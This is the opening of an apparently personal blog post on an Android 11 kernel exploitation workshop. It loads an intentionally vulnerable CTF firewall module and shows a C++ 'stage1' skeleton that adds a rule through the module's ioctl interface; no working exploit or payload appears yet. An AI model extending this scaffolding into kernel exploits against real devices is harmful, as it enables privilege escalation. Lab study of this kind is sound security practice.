Android 11 Kernel Exploitation Workshop

Booted up an Android kernel as I mentioned here.

The branch name is android11-5.4.

Kernel is compiled

We used the wall-of-perdition’s vulnerable firewall to exploit.

We used the make in the compiled kernel directory in order to compile the firewall module

and then wget and insmod. Result is

I added a rule to the firewall for test purpose.

#include <iostream>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <stdint.h>
using namespace std;

#define ADD_RULE 0x1337babe
#define DELETE_RULE 0xdeadbabe
#define EDIT_RULE 0x1337beef
#define SHOW_RULE 0xdeadbeef
#define DUP_RULE 0xbaad5aad

typedef unsigned int u32;

typedef struct
{
    char iface[16];
    char name[16];
    char ip[16];
    char netmask[16];
    uint8_t idx;
    uint8_t type;
    uint16_t proto;
    uint16_t port;
    uint8_t action;
    #ifdef EASY_MODE
    char desc[DESC_MAX];
    #endif
} user_rule_t;

constexpr void errcheck(const char* buff,int fd){if(fd<0){cout<<"Error "<<buff<<endl;}}

struct Exp{

        u32 stage{ 0 };

        void stage1()
        {
                int fd = open("/dev/firewall",O_RDONLY);
                errcheck("open",fd);

                user_rule_t rule1;

                ioctl(fd,ADD_RULE,&rule1);
        }
};

int main(){
        struct Exp exp;
        exp.stage1();
}

We can interact to the firewall.

Well let’s start.


Yayımlandı

kategorisi

yazarı:

Etiketler:

Yorumlar

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir